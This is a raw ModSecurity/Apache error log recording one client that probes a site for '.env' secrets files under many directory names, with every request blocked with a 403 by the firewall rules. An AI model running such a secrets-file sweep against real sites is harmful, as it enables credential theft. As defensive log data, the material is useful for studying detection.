[Mon May 11 14:10:00.389999 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/public_html/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA2gAAAQ4"]
[Mon May 11 14:10:00.390397 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/public_html/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA2gAAAQ4"]
[Mon May 11 14:10:00.390583 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/public_html/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA2gAAAQ4"]
[Mon May 11 14:10:00.390820 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/public_html/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA2gAAAQ4"]
[Mon May 11 14:10:00.553228 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3AAAAQ4"]
[Mon May 11 14:10:00.553600 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3AAAAQ4"]
[Mon May 11 14:10:00.553780 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3AAAAQ4"]
[Mon May 11 14:10:00.554037 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3AAAAQ4"]
[Mon May 11 14:10:00.761811 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/www/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3gAAAQ4"]
[Mon May 11 14:10:00.762196 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/www/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3gAAAQ4"]
[Mon May 11 14:10:00.762388 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/www/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3gAAAQ4"]
[Mon May 11 14:10:00.762626 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/www/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3gAAAQ4"]
[Mon May 11 14:10:00.996149 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/html/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3wAAAQ4"]
[Mon May 11 14:10:00.996556 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/html/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3wAAAQ4"]
[Mon May 11 14:10:00.996739 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/html/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3wAAAQ4"]
[Mon May 11 14:10:00.996990 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/html/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA3wAAAQ4"]
[Mon May 11 14:10:01.219058 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/live/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4AAAAQ4"]
[Mon May 11 14:10:01.219446 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/live/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4AAAAQ4"]
[Mon May 11 14:10:01.219631 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/live/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4AAAAQ4"]
[Mon May 11 14:10:01.219879 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/live/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4AAAAQ4"]
[Mon May 11 14:10:01.323745 2026] [core:error] [pid 1320674:tid 1320710] [client 52.242.216.199:21707] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:01.323779 2026] [core:error] [pid 1320674:tid 1320710] [client 52.242.216.199:21707] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:01.382655 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/prod/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4QAAAQ4"]
[Mon May 11 14:10:01.383070 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/prod/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4QAAAQ4"]
[Mon May 11 14:10:01.383266 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/prod/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4QAAAQ4"]
[Mon May 11 14:10:01.383516 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/prod/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4QAAAQ4"]
[Mon May 11 14:10:01.630636 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/dev/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4gAAAQ4"]
[Mon May 11 14:10:01.631018 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/dev/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4gAAAQ4"]
[Mon May 11 14:10:01.631222 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/dev/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4gAAAQ4"]
[Mon May 11 14:10:01.631476 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/dev/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4gAAAQ4"]
[Mon May 11 14:10:01.858198 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/staging/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4wAAAQ4"]
[Mon May 11 14:10:01.858570 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/staging/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4wAAAQ4"]
[Mon May 11 14:10:01.858752 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/staging/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4wAAAQ4"]
[Mon May 11 14:10:01.858996 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/staging/.env"] [unique_id "agHHGVchVQ3tCn0m9OpA4wAAAQ4"]
[Mon May 11 14:10:02.175198 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/opt/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5AAAAQ4"]
[Mon May 11 14:10:02.175575 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/opt/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5AAAAQ4"]
[Mon May 11 14:10:02.175759 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/opt/.env"] [unique_id "agHHGlchVQ3tCn0m9OpA5AAAAQ4"]
